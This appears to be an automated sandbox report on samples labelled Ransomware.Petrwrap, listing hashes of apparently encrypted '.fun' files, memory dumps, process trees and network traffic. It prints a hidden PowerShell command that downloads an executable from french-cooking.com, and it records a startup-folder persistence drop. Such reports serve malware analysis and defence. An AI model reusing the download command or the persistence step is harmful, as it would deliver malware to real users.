SHA512 bed5906c7373814acc8a54c1631428a17f0aa69282920447a1575d8db826afd5dab262301dc6da610ff8bb81d24ec6babd3d9fb99fd6945f1aca9cb9c76ec2c9

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\themes\dark\bg_pattern_RHP.png.fun

MD5 b8454390c3402747f7c5e46c69bea782
SHA1 e922c30891ff05939441d839bfe8e71ad9805ec0
SHA256 76f8ed1dd50e50c7d62b804a0d6901a93e5534787d7b38467933d4c12ce98a0d
SHA512 22b26c62473e80d17c1f78df14757ccfb6c7175faa541705edc153c02baa7ab0982b5daabe8dd2c8c9efb92af81f55ccaeeecffe8ed9a0b3c26e89135ca50923

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\themes\dark\illustrations.png.fun

MD5 3ae8789eb89621255cfd5708f5658dea
SHA1 6c3b530412474f62b91fd4393b636012c29217df
SHA256 7c5b1d8469e232a58359ccbcb89e619c81c20e6d2c7579e4292eb9a19849bc5a
SHA512 f6998dbae1a2fa56f962045261a11a50b8e03573d9d4cf39083da3be341cc104e0ecf5908076f03961bcdb1356d05a7450d69940ec3aaab73623a6fe180e7051

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\themes\dark\illustrations_retina.png.fun

MD5 b7c62677ce78fbd3fb9c047665223fea
SHA1 3218c7b6fd8be5e0a8b67d3953d37d5dbd0c71d8
SHA256 aa638be6e1107ed1f14e8430abedd6f6d0a837a31b1b63e6a7741d6d417eddc2
SHA512 9e0cc29835845f2a0260a6989c1b362bac22a8e0c2825bc18f1dde812ce7868503881d2deaf951429a80b5017b6ce31e785ff524883e08d730aa38b36a2fb074

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\en-gb\ui-strings.js.fun

MD5 117d6f863b5406cd4f2ac4ceaa4ba2c6
SHA1 5cac25f217399ea050182d28b08301fd819f2b2e
SHA256 73acdc730d8a9ec8f340c724b4db96fc222bb1eaf836cec69dfe3fab8d6ac362
SHA512 e10883029c1e0fbc64bec9aac0a6957a8499af255e1790843717212077926474e02b2870c5dd04b057c956b97ad4bb1747fe73e731ea61b891f4b38dd80494d7

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\bun.png.fun

MD5 51da980061401d9a49494b58225b2753
SHA1 3445ffbf33f012ff638c1435f0834db9858f16d3
SHA256 3fb25ddd378ab756ec9faa56f16b76691cf6d9c7405bb9a09ce542a6f5b94e44
SHA512 ecc5eb2a045ce2508d461b999f16caba6cce55aa0c00b34bd73a33e0458795f93a77caff5026212912684164057be016f51dc57ec83821c2a1f2e27417c47b2c

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\cstm_brand_preview.png.fun

MD5 2863e8df6fbbe35b81b590817dd42a04
SHA1 562824deb05e2bfe1b57cd0abd3fc7fbec141b7c
SHA256 7f1238332901b740cde70db622abcfb533fc02f71e93101340073552f4820dad
SHA512 7b2d95465ea66951ea05c341549535a0a939d26dbde365b212e3983e4047fa6912c37d737cb8054c41bb1a7d92586d968a0154c666572a70ebc59a4776897f38

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\cstm_brand_preview2x.png.fun

MD5 79f6f006c95a4eb4141d6cedc7b2ebeb
SHA1 012ca3de08fb304f022f4ea9565ae465f53ab9e8
SHA256 e9847d0839d3cf1039bebdc49820ee7813d70941347ce420990592e5e3bd998e
SHA512 c143a4cf1ccfa98039b73214978722408188535ee4aa3dac08a34760b94bdf6d36ad0ff0de893da5b17fd69c96a6dfb25098ab7fec219fad1a77532113d0353e

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\dd_arrow_small2x.png.fun

MD5 f77086a1d20bca6ba75b8f2fef2f0247
SHA1 db7c58faaecd10e4b3473b74c1277603a75d6624
SHA256 cf10d2a22b638cf0978cf30ecaf39ecb5bb0e3ad78cd920afa433ad60cc1290d
SHA512 a77a897c0b41f4052cb9546d4cfd6e0856b288b6b8583a86d6c7e79059a05b19cc2593599251581e79107235e9d5cd589c392bf490452be04ff57e944cd19df3

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\dd_arrow_small.png.fun

MD5 b88e3983f77632fa21f1d11ac7e27a64
SHA1 03a2b008cc3fe914910b0250ed4d49bd6b021393
SHA256 8469b8a64e80d662eec71c50513f6d295ef4a3a9992763dbcac9d81253cef9d5
SHA512 5bf93d4f4250ca96169f3d27d4e648cc5d6e00b7558a3ef32e07edcbae36dadb8008d7ba5f83ac3ed812b72c9d52730e866191b4de7a339df57b5697e00df50d

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\nub.png.fun

MD5 e03c9cd255f1d8d6c03b52fee7273894
SHA1 d0e9a9e6efd1746bc9ccb4eb8e7701c1cd707e2e
SHA256 22a34c8321384fc7682102e40d082e7812232a9109e4d4e8fa2152fda3f260f6
SHA512 d4bd002197b725316e1f1f2dd0a70ee44a82a53ac0dafa8c6b1166343adc406e147d0c4cca30d65a32aa545f1b327c6b69c0ec1d15330af48a6faa234dc4b5ac

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\share_icons.png.fun

MD5 62b1443d82968878c773a1414de23c82
SHA1 192bbf788c31bc7e6fe840c0ea113992a8d8621c
SHA256 4e96529c023168df8dde241a9acdbf4788ea65bc35605e18febff2b2071f1e24
SHA512 75c8604ea65e0cdd9ea74b4802930444dd16a945da1e7f0af4a9a3762259ee9eb41ea96973555d06f4814ee2f6b73ab662c6b314b97876e9628fa5d4536e771c

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\share_icons2x.png.fun

MD5 bca915870ae4ad0d86fcaba08a10f1fa
SHA1 7531259f5edae780e684a25635292bf4b2bb1aac
SHA256 d153ed6c5ea8c2c2f1839f8dadcc730f61bd8cd86ad732bab002a258dea1d037
SHA512 03f23de6b0ae10e63c41e73308b3844d49379c55d2df75fa1dc00771b26253d832c21081d8289f04260369df996e31273b7c0788cf3b5c78a27ec909f14a283a

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\nl-nl\ui-strings.js.fun

MD5 14145467d1e7bd96f1ffe21e0ae79199
SHA1 5db5fbd88779a088fd1c4319ff26beb284ad0ff3
SHA256 7a75b8ec8809c460301f30e1960b13c518680792e5c743ce7e9a7f691cfafc38
SHA512 762d499c54c5a25aba4357a50bb4e6b47451babeda84fa62cfbd649f8350bca55204ad002883b9147e78dda3dbabaae8da1dc94b716204226bb53326030772b7

memory/3428-3824-0x00007FFB82FC0000-0x00007FFB83961000-memory.dmp

memory/3428-3825-0x00007FFB82FC0000-0x00007FFB83961000-memory.dmp

memory/3428-3826-0x00007FFB82FC0000-0x00007FFB83961000-memory.dmp

memory/3428-3829-0x00007FFB82FC0000-0x00007FFB83961000-memory.dmp

memory/3428-3830-0x00007FFB82FC0000-0x00007FFB83961000-memory.dmp

memory/2884-3831-0x000001A4AA780000-0x000001A4AA781000-memory.dmp

memory/2884-3832-0x000001A4AA780000-0x000001A4AA781000-memory.dmp

memory/2884-3833-0x000001A4AA780000-0x000001A4AA781000-memory.dmp

memory/2884-3843-0x000001A4AA780000-0x000001A4AA781000-memory.dmp

memory/2884-3842-0x000001A4AA780000-0x000001A4AA781000-memory.dmp

memory/2884-3841-0x000001A4AA780000-0x000001A4AA781000-memory.dmp

memory/2884-3840-0x000001A4AA780000-0x000001A4AA781000-memory.dmp

memory/2884-3839-0x000001A4AA780000-0x000001A4AA781000-memory.dmp

memory/2884-3838-0x000001A4AA780000-0x000001A4AA781000-memory.dmp

memory/2884-3837-0x000001A4AA780000-0x000001A4AA781000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\throttle_store.dat

MD5 9e4e94633b73f4a7680240a0ffd6cd2c
SHA1 e68e02453ce22736169a56fdb59043d33668368f
SHA256 41c91a9c93d76295746a149dce7ebb3b9ee2cb551d84365fff108e59a61cc304
SHA512 193011a756b2368956c71a9a3ae8bc9537d99f52218f124b2e64545eeb5227861d372639052b74d0dd956cb33ca72a9107e069f1ef332b9645044849d14af337

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 54b2455bfcdddf3c06291afc710b4f11
SHA1 a174a51217de5cbdf959e83677b25c5722223e28
SHA256 fafcd6b8f27b5df5c1b68a819c252d50b7db403ac6be9aae50dbb226528a728b
SHA512 e85ff8341fac21e5252f55a8cb833d3d498bd766e23987f9fd059d7b196bb0ed10230e90dfc26956752a7b49a2971ad17fde1787ea18af5f1b1b880b0da2c50b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 72fd997643f377e598a94b56fd757298
SHA1 f89647302abba836fae8f18f312997ebae7b8332
SHA256 4dd8ede795910cd3dab744e6fe7c66bb195a68fa5021e36d5be31dcb41f76c92
SHA512 4e2df8a2a436c4229f87cd2ce31f48c639236e6412d0e7911a2507f13000cce9d246804f5083fd90e628c1a0e2122ae6ca2d5695c41dcddefff159ccc045cf3f

\??\pipe\LOCAL\crashpad_3548_EVIKICAXLOFNQCAB

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 47f25abfb63f30fbbd3252de5f576beb
SHA1 34f1e502699adfb251a42589eca267fe5c1fbae0
SHA256 117d877bd0b3ce08ce73d02f32cf3074a0af0a75483224358f474d7fae8dce17
SHA512 7297075c02cbbb1002a7220e075e3ceb035c72092b061a345e50231cc8c1d7265dcd8ce508d60c5b6a0a883cc3df736d1cd165e3c064bea6e25c1f3ba36fc145

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 70e9da5b08506dc7b1633b22af2c5e7f
SHA1 309d197fb0bfbfd93e44acf88222c50fc8de965d
SHA256 276f77c7b64bbe94711af616aeb03ae943a1d2eb941b6e3174896ea6f8d36420
SHA512 3bfcfeeb7d50299fc8bd2b43f0c6d30893a19a6b8564ed25296ebcbf3716640142291516529be21a2e4009735280fbf0cdb00026d80d9a0133348b2cc9436159

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 10e64fe948d832948d1c1c059a133849
SHA1 6cc7a0534ff745c6bdbc44e19c0ead01f3cd9830
SHA256 6b64626fc0ba3a847d9abbdbcfa3310d65431e68cd14c9bc41fb118b72351504
SHA512 3896c5cc4da7f0479fb16b9c2b0132e79c87c018b56682af4cd3ac74b0d665f685d84e9bb529d8709fb7f110b95f27a9511941d940f0eba7ea75b8b49e12b993

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 1653479da817d09f7eb67986a9148ba7
SHA1 ef38bdd57d2d2130685d009c6711d9731597805d
SHA256 fd6fa0e7c7f58648e5e962495f322f0cf348a9fc2638374aff6be2d0cbea662d
SHA512 0d091452cf929beac2105ac8897e18abad0393d3aeb5904ce5b8683fc63b10785ad69dd57f79ecec28420742816d403a19dd98ee0d6bc70b4dceb4d09a21a071

memory/3428-3979-0x00007FFB82FC0000-0x00007FFB83961000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

MD5 d751713988987e9331980363e24189ce
SHA1 97d170e1550eee4afc0af065b78cda302a97674c
SHA256 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512 b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\ShaderCache\data_1

MD5 f50f89a0a91564d0b8a211f8921aa7de
SHA1 112403a17dd69d5b9018b8cede023cb3b54eab7d
SHA256 b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec
SHA512 bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\data_0

MD5 81c745a7b9da1870cb19b0adfba3e11c
SHA1 fae41656aacf3fac21e386c58766b9f9b8e6700d
SHA256 fe15bddb3882ff5c83526c80620fdad5412d911c553bb351816ee26f8d61a91d
SHA512 5faef262e2fa510d67728a6d327c56f95238d87aa9a1429718263cd44c0293f4da8529fa9d82c2ba12ae9b1794ac56b1f9e46e26a55beabb80d893c3c3cfa6bc

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000007

MD5 cfd2fdfedddc08d2932df2d665e36745
SHA1 b3ddd2ea3ff672a4f0babe49ed656b33800e79d0
SHA256 576cff014b4dea0ff3a0c7a4044503b758bceb6a30c2678a1177446f456a4536
SHA512 394c2f25b002b77fd5c12a4872fd669a0ef10c663b2803eb66e2cdaee48ca386e1f76fe552200535c30b05b7f21091a472a50271cd9620131dfb2317276dbe6c

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000006

MD5 1d5f57b36984d3bc13513937212f7c85
SHA1 6962d480bc6216080b90505c9f25c8a3ed4c8df0
SHA256 7c5544c2101aa4a9ab3bd0ed98d6d1126457f802c8073333d2e7fb7be273dc30
SHA512 dcb01342a2eb9ff3ed03a23b7e0914ccb626e1136c2a24dc4e8144cd785c90acdbffc877408a922519055f0a375b4a31172e3120744de656d55dcd83b84a4f4a

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000005

MD5 26a31ce75ac8de1d6c95dfa64a71c9ef
SHA1 344db07d1d45301e7ac65978f8a9756b0e6e6fe5
SHA256 021c57f13e1e9eeefa54e0b14f352549bb3772e8b0d846b27c0b04eac1d585ef
SHA512 8ec5e308b3fa0f40255546576d5f0a014db71f14d992c35c66f8eb3d981dba74fa7fde308b8e34431f28a58b24e0e0cec5fb076811614985d88a196c91806c5c

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\data_3

MD5 c1bcbe601dd74de7e292508c7d4690d2
SHA1 507efa66aece1f3a8517211f8c01fc2cdf8e11c2
SHA256 414426141bafd1eb80481706dde44b584f0ae5a4bbfc05e89912b05343c4e8fd
SHA512 43342a45b995aa305f68678d34a6f8c28086f90e40c4ce0604f83f16a42a653c43ce76123487ead556d04c9e7545df68314a8a6fc32811a5b0efbb692eab4cb7

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\data_2

MD5 c4cc026ba9c6a06fb7237734d18d13a0
SHA1 65b5b78b21cc2f82ddb5b7ede3777872a676c5ee
SHA256 c620ab7d666c26e8873b9805fcb06d812fb6c5e7ecb55198b8dd924b17da486f
SHA512 7311a34058c0671e1fea5b5863c8744d5df8abaf85865825a8e013639d36daaf8556c92e18fb32d28fda8c591e643e962d4ac08bb0ec1e8a0f5551b5400dbfc0

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\data_1

MD5 01970935c674f63ca63204d759a8c7cb
SHA1 cba8da3336b3b50381861cd73a8b5108439b3069
SHA256 6a1f6935f74975a5907d0676377abe28d77e841475389ac4e6e0a5c254362e5b
SHA512 278ca4a8c01d514580f412be09797488f2a6394541204ffc28761d05a520836bc960b270d291918b8d50abd1a8ddf064e92e94cf4082825716a86fcfd86c2b13

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\GrShaderCache\data_3

MD5 5ff8f8987906c1a7271ff7d9db09824e
SHA1 d4ae9dc7afc8689a09708b71a6bcd0df112f195e
SHA256 19fea9161a1d71c6c2476aaba0586c64cf6cc5b29db8c1836e0146f24269c071
SHA512 b2f45874a3de891e7b5a359d550036c339094a032349217774a993f3d612b05852c76c38c4d3cf7cdc9922f83088e937f2bc7c3d8c6474d3f28b6e1ec71ee915

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\GrShaderCache\data_0

MD5 7a80e942bd78ca60aec4ed288dde8b75
SHA1 fdf7df7a014cfe4b8a7ec73059d4fa87c1169653
SHA256 0fa04a271404bc3c9635d5f326d1a918857f60238b8784d2cfc683d6a1315f49
SHA512 11a6c88d72894a2e75622a64d0b186e729196e65d56826af50377209949c1b763e13da2c2712fd146157aa36c2b5f365aac94302809354dcb9bf98fdd8012a6f

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\GrShaderCache\data_1

MD5 5c6dfc6e77b99ee870e40d22bfab50a1
SHA1 9a9045aa66242a04152f98920e54c9d3ba12e48c
SHA256 8e6490d21c00a1b7e079c896128ae16e0509771dc81a1bd3d3f605900299f892
SHA512 32d1f23863e33babcde04b26d49db6655269537778245718b572d4595586e98bcf9b9c566e984b73ada30c5774fd9505ccab6786ed745e14742684b4ca2b9fed

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat

MD5 72e4c3ebb537e0f3004613ddcb1f1f7a
SHA1 189caeb981f4cd50c861744d69fa90a0a726aea8
SHA256 96d6be3f6368eb7b759108d76717fa07adbce7c17f538d10bc04f71538460670
SHA512 433652038e10b0473a9e552d63a6a8ade2defd8d82c09b64908e49e3b2bcde64cf09359c6ad0686f9faec3f614ab956ca7c94e915e3a024a779586d144c31588

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 a9e8b8b5c1002967e8a3999a9cf3f2ae
SHA1 9586e32bca3acfdbddfe9283d71b2288bf225df6
SHA256 fe4727792968d55bf5006207f68631b4c5f964b2d3ee7fa2ab7a16c5d085e6f5
SHA512 82ad63120da655ce80dddce99660b1156e4145275c0d5322d31a894af0a29def538348bfce1b4a742f2fdb0808f948f1db389c20aa82f4d689498bd88536d36f

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 d081d45ad4a76f9cd48ccadef2f18445
SHA1 e601ce653c9e6acf1f5429dabf0a21567dc858e2
SHA256 072653951345a9019dcd9e33c1850d39eae0869565ccabad226850597053b01c
SHA512 db25d3d4d0aca8b48c264b9fb5e4254bb0a3abefac07a16ac1fc1dda8a81ea17255b4e7c44d24564ca4806ddc19682f8184f9dc37e9b4b231742905d9ffdb21d

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\StartUnifiedTileModelCache.dat

MD5 5ef891f52576f52daa5eec976e97760c
SHA1 02c028947ea73c943539eb8a162f9231ceafe3cd
SHA256 774f23c7171a5bc84f53f9c1d61153b43defbc4b3589a608e01f6d46d2b0bc91
SHA512 048598e3cfdbdc3832da4fd97b5d3d9a39a73ef3c2ead8dcac408ef576039ece040d0ac29ed210a5baa01cc818cd25261468ed53322e3dc4f49980d94f95ed8a

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\~tartUnifiedTileModelCache.tmp

MD5 907f7b3d3410d67b7a65b849fe4c5c66
SHA1 0d1f94d02810d191376d8d2a39c7f385e6f85785
SHA256 fb2c68005df09ffdd2520d038bf095ea209864a82168b10ee7d625c6e2a32276
SHA512 861d05c8f9a3f250e5ffe6fb6eff205d9d267d4fd1eb896ddc009152235613297709d99fa1735d6ab5ddef09769019801b5e6a79f03db7d78fd693d4488fcec2

Analysis: behavioral22

Detonation Overview

Submitted

2024-06-30 00:59

Reported

2024-06-30 01:30

Platform

win10v2004-20240611-en

Max time kernel

1385s

Max time network

1176s

Command Line

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Petrwrap\Ransomware.Petrwrap\myguy.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\mshta.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2104 wrote to memory of 1612 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2104 wrote to memory of 1612 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2104 wrote to memory of 1612 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Windows\SysWOW64\mshta.exe

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Petrwrap\Ransomware.Petrwrap\myguy.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2104 -ip 2104

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile('http://french-cooking.com/myguy.exe', 'C:\Users\Admin\AppData\Roaming\51030.exe');

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2104 -s 1368

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 203.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 13.107.21.237:443 g.bing.com tcp
US 8.8.8.8:53 20.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 french-cooking.com udp
FR 54.36.91.62:80 french-cooking.com tcp
NL 23.62.61.97:443 www.bing.com tcp
US 8.8.8.8:53 62.91.36.54.in-addr.arpa udp
US 8.8.8.8:53 97.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 107.12.20.2.in-addr.arpa udp
US 8.8.8.8:53 57.169.31.20.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 8.8.8.8:53 10.28.171.150.in-addr.arpa udp
US 8.8.8.8:53 225.162.46.104.in-addr.arpa udp

Files

memory/1612-0-0x0000000070E6E000-0x0000000070E6F000-memory.dmp

memory/1612-1-0x00000000028A0000-0x00000000028D6000-memory.dmp

memory/1612-2-0x0000000005610000-0x0000000005C38000-memory.dmp

memory/1612-3-0x0000000070E60000-0x0000000071610000-memory.dmp

memory/1612-4-0x0000000070E60000-0x0000000071610000-memory.dmp

memory/1612-5-0x0000000005430000-0x0000000005452000-memory.dmp

memory/1612-7-0x0000000005570000-0x00000000055D6000-memory.dmp

memory/1612-6-0x0000000005500000-0x0000000005566000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_y3xdy1kc.xlh.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1612-17-0x0000000005D40000-0x0000000006094000-memory.dmp

memory/1612-18-0x00000000061E0000-0x00000000061FE000-memory.dmp

memory/1612-19-0x0000000006230000-0x000000000627C000-memory.dmp

memory/1612-20-0x0000000007A50000-0x00000000080CA000-memory.dmp

memory/1612-21-0x0000000006710000-0x000000000672A000-memory.dmp

memory/1612-24-0x0000000070E60000-0x0000000071610000-memory.dmp

Analysis: behavioral23

Detonation Overview

Submitted

2024-06-30 00:59

Reported

2024-06-30 01:30

Platform

win7-20240508-en

Max time kernel

1797s

Max time network

1804s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Petrwrap\Ransomware.Petrwrap\svchost.exe"

Signatures

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Notepad.lnk C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Petrwrap\Ransomware.Petrwrap\svchost.exe N/A

Enumerates physical storage devices

Processes

C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Petrwrap\Ransomware.Petrwrap\svchost.exe

"C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Petrwrap\Ransomware.Petrwrap\svchost.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp
